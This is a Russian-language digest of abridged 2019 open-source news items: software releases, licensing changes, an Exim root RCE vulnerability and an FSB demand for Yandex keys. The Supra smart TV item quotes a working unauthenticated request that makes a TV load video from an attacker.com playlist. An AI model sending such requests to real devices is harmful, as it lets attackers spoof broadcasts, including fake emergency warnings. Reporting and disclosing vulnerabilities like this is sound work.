После двух лет разработки подготовлен новый значительный выпуск легковесного оконного менеджера IceWM 1.5.5 (первый выпуск в ветке 1.5.x). Ветка 1.5 продолжает развитие неофициального форка, ответвившегося в декабре 2015 года от заброшенной кодовой базы IceWM. Код написан на языке Си и распространяется под лицензией GPLv2. Из особенностей IceWM можно отметить полноценное управление через клавиатурные комбинации, возможность использования виртуальных рабочих столов, панели задач и меню-приложений. Оконный менеджер настраивается через достаточно простой файл конфигурации, возможно использование тем оформления. Доступны встроенные апплеты для мониторинга CPU, памяти, трафика. Отдельно развивается несколько сторонних GUI для настройки, реализаций рабочего стола и редакторов меню. Основные изменения: Реализована возможность … Читать далее Релиз оконного менеджера IceWM 1.5

Представлен релиз KnotDNS 2.8.2, высокопроизводительного авторитативного DNS сервера (рекурсор выполнен в виде отдельного приложения), поддерживающего все современные возможности DNS. Проект разрабатывается чешским реестром имен CZ.NIC, написан на языке Си и распространяется под лицензией GPLv3. Сервер отличается ориентацией на высокую производительность обработки запросов, для чего применяется многопоточная, и по большей части неблокирующая реализация, хорошо масштабируемая на SMP-системах. Предоставляются такие возможности, как добавление и удаление зон на лету, передача зон между серверами, DDNS (динамические обновления), NSID (RFC 5001), расширения EDNS0 и DNSSEC (включая NSEC3), ограничения интенсивности ответов (RRL). В новом выпуске: Представлен новый режим блокировки для обработчиков событий с зонами, задаваемых через … Читать далее Выпуск DNS-сервера KnotDNS 2.8.2

Проект VideoLAN опубликовал корректирующий релиз медиаплеера VLC 3.0.7. В новой версии устранено 24 уязвимости (CVE не присвоены), которые потенциально могут привести к переполнению буфера при обработке различных видов контента, в том числе файлов MKV, MP4 и OGG. Проблемы были выявлены в ходе инициативы инициативы FOSSA (Free and Open Source Software Audit), нацеленной на повышение безопасности открытого ПО и учреждённой Европейской комиссией. Из не связанных с безопасностью изменений отмечается улучшение поддержки меню на дисках Blu-ray, формата MP4, устройств Chromecast, а также использования HDR на платформе Windows. Обновлены скрипты для взаимодействия с сервисами Youtube, Dailymotion, Vimeo и Soundcloud. Источник: http://www.opennet.ru/opennews/art.shtml?num=50824 Читать далее Релиз медиапроигрывателя VLC 3.0.7

После двух лет разработки доступен первый предварительный выпуск нового почтового клиента Aerc 0.1, предоставляющего консольный интерфейс с поддержкой вкладок и оптимизированного для разработчиков, использующих списки рассылки и Git. Вкладки переключаются в стиле tmux и позволяют, например, проверять новые письма и просматривать нити обсуждений одновременно c написанием ответа и работой в терминале с Git. Код проекта написан на языке Go и распространяется под лицензией MIT. Проект развивает Дрю ДеВолт (Drew DeVault), разработчик Sway, композитного менеджера на базе Wayland. Основные особенности: Отображение разметки HTML через интерактивный консольный web-браузер; Подсветка прикреплённых к письмам патчей; Клавиатурные комбинации и система ex-команд («:команда») в стиле Vim; … Читать далее Представлен многооконный консольный почтовый клиент Aerc

В почтовом сервере Exim выявлена критическая уязвимость (CVE-2019-10149), которая может привести к удалённому выполнению кода на сервере с правами root при обработке специально оформленного запроса. Возможность эксплуатации проблемы отмечена в версиях с 4.87 по 4.91 включительно или при сборке с опцией EXPERIMENTAL_EVENT. В конфигурации по умолчанию атака может быть совершена без лишних усложнений локальным пользователем, так как применяется ACL «verify = recipient», выполняющий дополнительные проверки для внешних адресов. Совершение удалённой атаки возможно при изменении настроек, например, при работе в роли вторичного MX для другого домена, удалении ACL «verify = recipient» или определённых изменениях в local_part_suffix). Удалённая атака также возможна если … Читать далее Критическая уязвимость в Exim, позволяющая выполнить код на сервере с правами root

Представлен релиз Linux-дистрибутива Zorin OS 15, основанного на пакетной базе Ubuntu 18.04.2. Целевой аудиторией дистрибутива являются начинающие пользователи, привыкшие работать в Windows. Для управления оформлением дистрибутив предлагает специальный конфигуратор, позволяющий придать рабочему столу вид, свойственный различным версиям Windows, а в состав включена подборка программ, близких к программам к которым привыкли пользователи Windows. Размер загрузочного iso-образа составляет 2.3 Гб (поддерживается работа в Live-режиме). Основные изменения: Добавлен компонент Zorin Connect на основе GSConnect и KDE Connect и связанное с ним мобильное приложение для сопряжения рабочего стола с мобильным телефоном. Приложение позволяет на рабочем столе отображать уведомления смартфона, просматривать фотографии с телефона, отвечать … Читать далее Выпуск Zorin OS 15, дистрибутива для пользователей, привыкших к Windows

Александр Ларсон (Alexander Larsson), разработчик Flatpak и активный участник проекта GNOME, представил новый проект Gthree, в рамках которого подготовлен порт 3D-библиотеки three.js для GObject и GTK. API Gthree практически идентичен three.js, в том числе реализован загрузчик glTF (GL Transmission Format) и возможность использования в моделях материалов на базе PBR (Physically Based Rendering). Для отрисовки поддерживается только OpenGL. На практике Gthree может применяться для добавления 3D-эффектов в приложения GNOME. Источник: http://www.opennet.ru/opennews/art.shtml?num=50817 Читать далее Представлен Gthree, порт three.js для GObject и GTK

Опубликован выпуск операционной системы NetBSD 8.1. В соответствии с новым процессом подготовки выпусков, NetBSD 8.1 отнесён к категории корректирующих обновлений и включает в основном исправления проблем, выявленных с момента публикации NetBSD 8.0. Значительным станет выпуск NetBSD 9. Для загрузки подготовлены установочные образы размером 736 Мб, доступные в сборках для 58 системных архитектур и 16 различных семейств CPU. Основные изменения: В rc.conf добавлен новый пареметр smtoff для отключения SMT/Hyper-Threading; Улучшены драйверы DRM/KMS; Добавлен драйвер bwfm для беспроводных адаптеров Broadcom FullMAC с интерфейсами PCI и USB; Добавлен драйвер mfii для RAID-контроллеров LSI Logic MegaRAID SAS Fusion; Обновлены httpd и dhcpcd (7.2.2). Внесены … Читать далее Выпуск NetBSD 8.1

Компания Google представила релиз web-браузера Chrome 75. Одновременно доступен стабильный выпуск свободного проекта Chromium, выступающего основой Chrome. Браузер Chrome отличается использованием логотипов Google, возможностью загрузки модуля Flash по запросу, наличием системы отправки уведомлений в случае краха, модулями для воспроизведения защищённого видеоконтента (DRM), системой автоматической установки обновлений и передачей при поиске RLZ-параметров. Следующий выпуск Chrome 76 запланирован на 30 июля. Основные изменения в Chrome 75: В метод canvas.getContext() добавлен флаг «desynchronized» для обработки контекстов Canvas (2D или WebGL) с использованием альтернативной системы отрисовки, обеспечивающей минимальные задержки за счёт обхода штатного механизма обновления DOM и вывода напрямую через OpenGL; Расширен API Web … Читать далее Релиз Chrome 75

Разработчики распределённой СУБД CockroachDB объявили о переводе исходных текстов проекта на связку из лицензий Business Source License (BSL) и Cockroach Community License (CCL), не являющуюся свободной из-за дискриминации отдельных категорий пользователей. Лицензия BSL три года назад была предложена сооснователями MySQL в качестве альтернативы модели Open Core. Суть BSL в том, что код расширенной функциональности изначально доступен для внесения изменений, но в течение какого-то промежутка времени может применяться бесплатно только при соблюдении дополнительных условий, для обхода которых требуется приобретение коммерческой лицензии. Новая лицензия допускает применение CockroachDB на любом числе узлов в кластере и встраивание в приложения, в том числе, которые продаются … Читать далее СУБД CockroachDB переходит на несвободную лицензию

Группа исследователей из Политехнического университета Виргинии, а также компаний Cyentia и RAND, опубликовала результаты анализа рисков при применении различных стратегий исправления уязвимостей. Изучив 476 тысяч уязвимостей, найденных с 2009 по 2018 год, было выявлено, что только 4183 из них (5.5%) применялись для осуществления реальных атак. Полученный показатель в пять раз превышает ранее опубликованные прогнозы, в которых число эксплуатируемых проблем оценивалось примерно в 1%. При этом не найдено корреляции между публикацией прототипов эксплоита в открытом доступен и попытками эксплуатации уязвимости. Из всех известных исследователям фактов эксплуатации уязвимостей только в половине случаев для проблемы до этого в открытых источниках публиковался прототип эксплоита. … Читать далее Около 5.5% выявляемых уязвимостей используются для осуществления атак

Доступна новая версия браузера Tor Browser 8.5.1, ориентированного на обеспечение анонимности, безопасности и приватности. Браузер сосредоточен на обеспечении анонимности, безопасности и приватности, весь трафик перенаправляется только через сеть Tor. Обратиться напрямую через штатное сетевое соединение текущей системы невозможно, что не позволяет отследить реальный IP пользователя (в случае взлома браузера, атакующие могут получить доступ к системным параметрам сети, поэтому для полного блокирования возможных утечек следует использовать такие продукты, как Whonix). Сборки Tor Browser подготовлены для Linux, Windows, macOS и Android. В новом выпуске устранены ошибки, выявленные с момента публикации релиза Tor Browser 8.5 и устранён вектор идентификации браузера (fingerprinting) через WebGL, … Читать далее Выпуск Tor Browser 8.5.1

После семи месяцев разработки опубликован выпуск фонового процесса earlyoom 1.3, который периодически проверяет объем доступной памяти (MemAvailable, SwapFree) и пытается на ранней стадии отреагировать на возникновения нехватки памяти. Если объём доступной памяти меньше заданного значения, то earlyoom принудительно (через отправку SIGTERM или SIGKILL) завершит работу процесса, наиболее активно потребляющего память (имеющего самое большое значение /proc/*/oom_score), не доводя состояние системы до очистки системных буферов и мешающего работе своппинга (обработчик OOM (Out Of Memory) в ядре срабатывает когда состояние нехватки памяти уже достигло критичных значений и обычно к этому моменту система уже не реагирует на действия пользователя). Earlyoom поддерживает отправку уведомлений о … Читать далее Выпуск earlyoom 1.3, процесса для раннего реагирования на нехватку памяти

Представлен промежуточный выпуск Firefox 67.0.1, примечательный включением по умолчанию блокировки отслеживания перемещений, при которой отключается выставление Cookie для доменов, уличённых в отслеживании перемещений, несмотря на установку заголовка «Do Not Track». Блокировка осуществляется на основе чёрного списка disconnect.me. Изменение применяется для стандартного режима, ранее включавшего блокировку только для окна приватного просмотра. От строго режима блокировки указанное изменение отличается отсутствием отключения загрузки внешнего кода для отслеживания перемещений. При этом блокировка Cookie трекеров по умолчанию пока активируется только для новых установок, а для старых пользователей остаются в силе прежние настройки. Переключение алгоритма блокировки для старых пользователей планируется осуществить в ближайшие несколько месяцев. До … Читать далее Выпуск Firefox 67.0.1 c включением по умолчанию блокировки отслеживания перемещений

Компания Unity Technologies объявила о формировании предварительного выпуска редактора для создания игр Unity Editor для GNU/Linux. Выпуск сформирован после нескольких лет публикации неофициальных экспериментальных сборок. Теперь компания планирует обеспечить официальную поддержку Linux. Отмечается, что спектр поддерживаемых операционных систем расширяется в связи с ростом спроса на Unity в различных сферах, от игровой и киноиндустрии, до автомобилестроения и управления транспортом. Для тестирования предложена предварительная версия редактора для Ubuntu 16.04/18.04 и CentOS 7 (установка через UnityHub), отзывы о работе которой принимаются в форуме Unity. Полноценная поддержка редактора для Linux ожидается в выпуске Unity 2019.3. Предложенная сборка редактора доступна всем пользователям лицензий Personal (бесплатная), … Читать далее Разработчики игрового движка Unity анонсировали Unity Editor для GNU/Linux

В телевизорах Supra Smart Cloud TV выявлена уязвимость (CVE-2019-12477), позволяющая подменить просматриваемую в данный момент передачу на контент атакующего. В качестве примера продемонстрирован вывод фиктивного предупреждения о возникновении чрезвычайной ситуации. Для атаки достаточно отправить специально оформленный сетевой запрос, не требующий аутентификации. В частности, можно обратиться к обработчику «/remote/media_control?action=setUri&uri=» указав URL m3u8-файла с параметрами видео, например «http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8». В большинстве случаев доступ к IP-адресу телевизора ограничен внутренней сетью, но так как запрос отправляется через HTTP возможно применение методов для обращения к внутренним ресурсам при открытии пользователем специально оформленной внешней страницы (например, под видом запроса картинки или используя метод DNS Rebinding). Источник: http://www.opennet.ru/opennews/art.shtml?num=50806 Читать далее Уязвимость в умных телевизорах Supra, позволяющая вывести фиктивное видео

Проект Qt опубликовал выпуск Qt Design Studio 1.2, окружения для проектирования интерфейса пользователя и разработки графических приложений на базе Qt. Qt Design Studio позволяет упростить совместную работу дизайнеров и разработчиков над созданием рабочих прототипов сложных и масштабируемых интерфейсов. Дизайнеры могут сосредоточиться только над графическим макетом оформления, в то время как разработчики могут уделить основное внимание разработке логики работы приложения, используя автоматически сгенерированный для макетов дизайнера QML-код. При помощи предлагаемого в Qt Design Studio рабочего процесса можно в считанные минуты превратить подготовленные в Photoshop или других графических редакторах макеты в рабочие прототипы, которые можно запустить на реальных устройствах. Изначально продукт поставлялся … Читать далее Выпуск среды разработки Qt Design Studio 1.2

Изданию РБК стало известно, что несколько месяцев назад ФСБ направила в «Яндекс» требование предоставить ключи для дешифровки данных пользователей сервисов «Яндекс.Почта» и «Яндекс.Диск», но за прошедшее время «Яндекс» так и не предоставил в спецслужбу ключи, хотя по закону на это отводится не более десяти дней. Ранее из-за отказа поделиться ключами в России по решению суда был заблокирован мессенджер Telegram. По словам источника РБК, в «Яндексе» считают, что ФСБ слишком широко трактует норму «закона Яровой»: «Спецслужба требует от компании предоставить сессионные ключи, которые, по сути, дают доступ не только, например, к сообщениям в почте, но и позволяют анализировать весь трафик от … Читать далее ФСБ потребовала ключи шифрования к данным пользователей Яндекс, но компания не передает их

Сташик Михальский (Stasiek Michalski), один из деятельных участников команды openSUSE Artwork Team, выставил на обсуждение вопрос целесообразности проведения ребрендинга openSUSE. В настоящее время в компании SUSE и свободном проекте openSUSE используется общий логотип, что вызывает путаницу и искажённое восприятие проекта у потенциальных пользователей. С другой стороны проекты SUSE и openSUSE неразрывно связаны, особенно после перехода на использование общих пакетов базовой системы, что подчёркивает сходство логотипов. Помимо пересечения с брендом SUSE имеются и технические доводы в пользу смены логотипа, такие как слишком яркий цвет для печати на светлом фоне, плохое масштабирование и непригодность для очень мелких кнопок. Логотип плохо читается и … Читать далее Сообщество openSUSE обсуждает вопрос изменения бренда для дистанцирования от SUSE

Компания Smartisan Technology совершила пожертвование в 400 тысяч долларов проекту OpenBSD, став таким образом в третий раз «иридиевым» спонсором проекта и первым «иридиевым» спонсором в 2019 году. Статус iridium получают проекты, пожертвовавшие $100 000 или более. Среди прочих спонсоров проекта можно выделить: Facebook (2019 и 2017 года, «золотой» спонсор: от 25,000$ до 50,000$), Handshake (2018 год, «иридиевый» спонсор), Yandex (2018 год, «платиновый» спонсор: от 50,000$ до 100,000$, 2017 — «золотой»), Microsoft (2018 год — «золотой» спонсор, 2017 — «серебряный»: от 10,000$ до 25,000$) Стоит также отметить, что наряду с корпорациями, в первую тройку по суммам пожертвований ежегодно попадают объединённые пожертвования … Читать далее Первый iridium-спонсор OpenBSD в 2019 году

Компания Oracle выпустила второе функциональное обновление для ядра Unbreakable Enterprise Kernel R5, позиционируемого для использования в дистрибутиве Oracle Linux в качестве альтернативы штатному пакету с ядром из Red Hat Enterprise Linux. Ядро доступно для архитектур x86_64 и ARM64 (aarch64). Исходные тексты ядра, включая разбивку на отдельные патчи, опубликованы в публичном Git-репозитории Oracle. Пакет Unbreakable Enterprise Kernel 5 основан на ядре Linux 4.14 (UEK R4 базировался на ядре 4.1), которое дополнено новыми возможностями, оптимизациями и исправлениями, а также проверено на совместимость с большинством приложений, работающих в RHEL, и специально оптимизировано для работы с промышленным программным обеспечением и оборудованием Oracle. Установочные и … Читать далее Компания Oracle выпустила ядро Unbreakable Enterprise Kernel R5U2